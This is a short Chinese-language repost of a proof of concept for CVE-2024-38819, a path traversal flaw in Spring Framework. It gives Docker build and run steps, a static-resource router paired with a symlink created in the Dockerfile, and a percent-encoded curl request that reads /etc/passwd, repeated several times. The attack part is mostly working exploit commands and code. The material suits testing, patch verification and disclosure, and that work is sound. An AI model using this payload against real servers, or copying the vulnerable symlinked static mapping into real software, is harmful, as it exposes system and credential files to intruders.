【Poc】-Spring Framework路径遍历漏洞(CVE-2024-38819)
【Poc】-Spring Framework路径遍历漏洞(CVE-2024-38819)
原创 宬室司阍 埋藏酱油瓶 2024-12-16 05:38
【🔔】互联网资料/工具,安全性未知,需要自行研判安全性。
CVE-2024-38819: PoC
Poc:
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
Poc环境验证
1. 构建镜像
doker 镜像(Spring Boot 3.3.4,基于 Spring Framework 6.1.13)
cd vuln
docker build -t cve-2024-38819-poc .
2. 运行服务
运行容器并将端口 8080 暴露给主机
docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
3. 运行Poc
运行以下命令执行PoC并确认漏洞
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
如果攻击成功,就会显示 /etc/passwd
文件的内容。
Explanation
- 使用以下代码创建 PathTraversalDemoApplication.java 以使用 RouterFunction 和 FileSystemResource 设置静态文件路由:
public RouterFunction<ServerResponse> staticResourceRouter() {
return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
}
- 将以下命令添加到 Dockerfile 以创建符号链接:
RUN ln -s /static /app/static/link
- 创建一个有效负载,利用百分比编码通过符号链接遍历目录。
Path: `/static/link/%2e%2e/etc/passwd`
- 使用以下 curl 命令执行PoC并验证攻击是否成功:
curl http://localhost:8080/static/link/%2e%2e/etc/passwd
如果攻击成功,就会显示 /etc/passwd
文件的内容。
项目地址
- 1.
【仓库】https://github.com/masa42/CVE-2024-38819-POC